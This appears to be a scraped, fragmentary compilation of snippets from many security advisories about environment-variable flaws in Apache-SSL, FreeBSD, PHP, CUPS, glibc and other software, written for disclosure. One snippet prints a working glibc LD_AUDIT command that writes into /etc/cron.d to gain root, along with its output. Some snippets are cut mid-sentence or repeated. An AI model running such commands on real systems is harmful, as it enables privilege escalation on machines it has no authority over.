Next Page >>
environment variables
Apache-SSL is a secure Webserver, based on Apache and SSLeay/OpenSSL.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:
Apache-SSL provides environment variables that are filled with
(client) certificate data. If the subject of a client certificate
contains special characters, parts of these variables can be overwritten
or be filled with other parts of memory.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
load libraries via various LD_ environmental variables.
II. Problem Description
When running setuid programs rtld will normally remove potentially
dangerous environment variables. Due to recent changes in FreeBSD
environment variable handling code, a corrupt environment may
result in attempts to unset environment variables failing.
III. Impact
Description:
The WordNet 3.0 Unix library and command-line interface suffer from a
number of stack overflows due to their handling of command line
arguments,
environment variables and data read from user supplied dictionaries.
The oCERT team was contacted by Moritz Muehlenhoff from the Debian
project requesting an audit of the WordNet code base. These
vulnerabilities
were the findings of the requested audit.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Tomboy doesn't properly handle environment variables, potentially
allowing a local attacker to execute arbitrary code.
Background
==========
stack-based buffer overflows.
* Rob Holland (oCERT) reported two boundary errors within the
do_init() function in lib/morph.c, which lead to stack-based buffer
overflows via specially crafted "WNSEARCHDIR" or "WNHOME" environment
variables.
* Rob Holland (oCERT) reported multiple boundary errors in the
bin_search() and bin_search_key() functions in binsrch.c, which lead
to stack-based buffer overflows via specially crafted data files.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Blam doesn't properly handle environment variables, potentially
allowing a local attacker to execute arbitrary code.
Background
==========
in the TELNET protocol, it is strongly recommended that the SSH protocol
be used instead. The FreeBSD telnet daemon can be enabled via the
/etc/inetd.conf configuration file and the inetd(8) daemon.
The TELNET protocol allows a connecting client to specify environment
variables which should be set in any created login session; this is used,
for example, to specify terminal settings.
II. Problem Description
In order to prevent environment variable based attacks, telnetd(8) "scrubs"
and 1.4.2_29 and earlier for Solaris and Linux allows local standalone
applications to affect confidentiality, integrity, and availability via
unknown vectors related to Launcher. NOTE: the previous information was
obtained from the February 2011 CPU. Oracle has not commented on claims
from a downstream vendor that this issue is an untrusted search path
vulnerability involving an empty LD_LIBRARY_PATH environment variable
(CVE-2010-4450).
Unspecified vulnerability in the Java Runtime Environment (JRE)
in Oracle Java SE and Java for Business 6 Update 23 and earlier,
5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote
Description
===========
Bernhard R. Link discovered that Eterm opens a terminal on :0 if the
"-display" option is not specified and the DISPLAY environment variable
is not set. Further research by the Gentoo Security Team has shown that
aterm, Mrxvt, multi-aterm, RXVT, rxvt-unicode, and wterm are also
affected.
Impact
any rate, they're in the Windows Ghostscript distribution I have
installed here.
The Windows scripts (gs*\lib\*.bat) are similarly vulnerable: no use of
-P-, and letting the executable name be overridden by an environment
variable.
--
Michael Wojcik
Principal Software Systems Developer, Micro Focus
before 5.2.11 and 5.3.x before 5.3.1 does not enforce the (1)
safe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars
directives, which allows context-dependent attackers to execute
programs with an arbitrary environment via the env parameter, as
demonstrated by a crafted value of the LD_LIBRARY_PATH environment
variable (CVE-2009-4018).
Intermittent segfaults occured on x86_64 with the latest phpmyadmin
and with apache (#53735).
Additionally, some packages which require so, have been rebuilt and
Description
===========
Viesturs reported that the default configuration for Gentoo's init
script ("/etc/conf.d/firebird") sets the "ISC_PASSWORD" environment
variable when starting Firebird. It will be used when no password is
supplied by a client connecting as the "SYSDBA" user.
Impact
======
On Tue, May 08, 2012 at 12:24:52PM -0500, Derek Martin wrote:
> Henrik Erkkonen has discovered that, through clever manipulation of
> environment variables on the ssh command line, it is possible to
> circumvent rssh. As far as I can tell, there is no way to effect a
> root compromise, except of course if the root account is the one
> you're attempting to protect with rssh...
>
> This project is old, and I have no interest in continuing to maintain
> it.
Problem type : remote
Debian-specific: no
CVE ID : CVE-2011-3148 CVE-2011-3149
Kees Cook of the ChromeOS security team discovered a buffer overflow
in pam_env, a PAM module to set environment variables through the
PAM stack, which allowed the execution of arbitrary code. An additional
issue in argument parsing allows denial of service.
The oldstable distribution (lenny) is not affected.
The patch I submitted to the Apache group
1) by default makes use of the /dev/urandom device that is available
on most modern open systems OSes
2) allows the user to specify another seed source (such as /dev/random)
via an environment variable
3) prints a warning if it has to fall back to using time()
Users of Microsoft Windows or other target platforms that lack /dev/urandom
might want to improve on this approach with appropriate APIS such as
RtlGenRandom on Windows. Also, the patch provides no updates to the htpasswd
CVE Id(s) : CVE-2010-3847 CVE-2010-3856
Debian Bug : 600667
Ben Hawkes and Tavis Ormandy discovered that the dynamic loader in GNU
libc allows local users to gain root privileges using a crafted
LD_AUDIT environment variable.
For the stable distribution (lenny), this problem has been fixed in
version 2.7-18lenny6.
For the upcoming stable distribution (squeeze), this problem has been
(simple) Windows shortcut. If a user double clicks such a message,
Outlook will open the link provided by the PR_ATTACH_PATHNAME or
PR_ATTACH_LONG_PATHNAME MAPI property.
Setting PR_ATTACH_PATHNAME to cmd.exe causes Outlook to search the PATH
environment variable for an executable named cmd.exe. If such a file is
found, this file will be executed. Normally this will result in a
command shell. The path name can be set to anything that is supported by
Windows, including UNC names (i.e.
\\servername\sharename\executable.exe) but also URLs (i.e.
http://www.akitasecurity.nl/advisory/RunCalc.exe). For URLs, Outlook
before 5.2.11 and 5.3.x before 5.3.1 does not enforce the (1)
safe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars
directives, which allows context-dependent attackers to execute
programs with an arbitrary environment via the env parameter, as
demonstrated by a crafted value of the LD_LIBRARY_PATH environment
variable (CVE-2009-4018).
The updated packages have been patched to correct these issues.
_______________________________________________________________________
References:
incorrect fix for CVE-2011-4885 (CVE-2012-0830). Note: this was fixed
with php-5.3.10
PHP before 5.3.10 does not properly perform a temporary change
to the magic_quotes_gpc directive during the importing of
environment variables, which makes it easier for remote attackers
to conduct SQL injection attacks via a crafted request, related to
main/php_variables.c, sapi/cgi/cgi_main.c, and sapi/fpm/fpm/fpm_main.c
(CVE-2012-0831).
Insufficient validating of upload name leading to corrupted $_FILES
Explanation of the code:
»argv[1]« is the first command line argument, that is compared with the string
»estasklight«. If it is equal the »auth« flag is set.
If the user has the environment variable »ES_LIBRARY_PATH« set, the value is
copied to two new environment variables »LD_LIBRARY_PATH« and »LIBPATH«.
If the »auth« flag is set, the application »estasklight« is executed.
scripting (XSS) attacks and HTTP response splitting attacks via vectors
related to (a) the product's web interface, (b) the configuration of
the print system, and (c) the titles of printed jobs (CVE-2009-2820).
The _cupsGetlang function, as used by lppasswd.c in lppasswd in CUPS
1.2.2, 1.3.7, 1.3.9, and 1.4.1, relies on an environment variable
to determine the file that provides localized message strings, which
allows local users to gain privileges via a file that contains crafted
localization data with format string specifiers (CVE-2010-0393).
The updated packages have been patched to correct these issues.
but I don't own a domain:( I tried to attach ZIP archive, but it seems
it's being filtered.
Exploit code is a bit bloated, but because of the code repetition and
redundancy, I decided to aggregate it together in a small application.
Boost library is required for project compilation (read from BOOST
environment variable).
DISCLOSURE TIMELINE:
---------------
2 Feb 2010: Discovery of vulnerabilities
Problem Description:
A vulnerability has been found and corrected in fcgi:
The FCGI (aka Fast CGI) module 0.70 through 0.73 for Perl, as used by
CGI::Fast, uses environment variable values from one request during
processing of a later request, which allows remote attackers to bypass
authentication via crafted HTTP headers (CVE-2011-2766).
The updated packages have been patched to correct this issue.
_______________________________________________________________________
a reference count. NOTE: some of these details are obtained from
third party information. NOTE: this vulnerability exists because of
an incomplete fix for CVE-2009-3553 (CVE-2010-0302).
The _cupsGetlang function, as used by lppasswd.c in lppasswd in CUPS
1.2.2, 1.3.7, 1.3.9, and 1.4.1, relies on an environment variable
to determine the file that provides localized message strings, which
allows local users to gain privileges via a file that contains crafted
localization data with format string specifiers (CVE-2010-0393).
The updated packages have been patched to correct these issues.
privilege escalations. Default Ubuntu installations were not affected.
Original advisory details:
Tavis Ormandy discovered multiple flaws in the GNU C Library's handling
of the LD_AUDIT environment variable when running a privileged binary. A
local attacker could exploit this to gain root privileges. (CVE-2010-3847,
CVE-2010-3856)
Updated packages for Ubuntu 8.04 LTS:
When the server receives a HTTP request for a real CGI (like for
example webmail.exe) it uses a buffer of about 20000 bytes for storing
all the environment strings which will be passed to the called program.
The HTTP fields passed by the client in his request are truncated at
200 bytes for the parameter and 800 for its value and are added as
environment variables (HTTP_parameter=value).
The lack of checks on the size of this environment buffer leads to a
buffer-overflow, anyway although is possible to control some registers
code execution is not certain.
Naturally both the surgemail and the swatch (port 7027) processes are
> 1. The directory from which the application loaded
> 2. 32-bit System directory (Windows\System32)
> 3. 16-bit System directory (Windows\System)
> 4. Windows directory (Windows)
> 5. Current working directory
> 6. Directories in the PATH environment variable As
> OracleOciLib is not used on target system, oci.dll does not
> exist, so if a full path is not supplied when calling the dll
> or the search path has not been cleared before the call, we
> will hit our fifth search path and load the library from the
> remote filesystem.
before 5.2.11 and 5.3.x before 5.3.1 does not enforce the (1)
safe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars
directives, which allows context-dependent attackers to execute
programs with an arbitrary environment via the env parameter, as
demonstrated by a crafted value of the LD_LIBRARY_PATH environment
variable (CVE-2009-4018).
The dba_replace function in PHP 5.2.6 and 4.x allows context-dependent
attackers to cause a denial of service (file truncation) via a key with
the NULL byte. NOTE: this might only be a vulnerability in limited
circumstances in which the attacker can modify or add database entries
$ ls -l /lib/libpcprofile.so
-rw-r--r-- 1 root root 5496 2010-10-12 03:32 /lib/libpcprofile.so
# We identified one of the pcprofile constructors is unsafe to run with
# elevated privileges, as it creates the file specified in the output
# environment variable.
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
privilege in Windows NT, 2000 in the default configuration and in
Windows 2003 in some circumstances.
This causes several instances of Windows PATH trolling, where Windows
tries to locate the icabar.exe file in the directories listed in its
PATH environment variable. If the attacker is able to write in any of
this directories listed in its PATH before the Citrix Metaframe PATH
entry, so the attacker can escalate privilege.
The standard file ACL (Access Control List) of Windows NT and 2000
Operating Systems is weak and allow any user to create files in the
Next Page>>
|
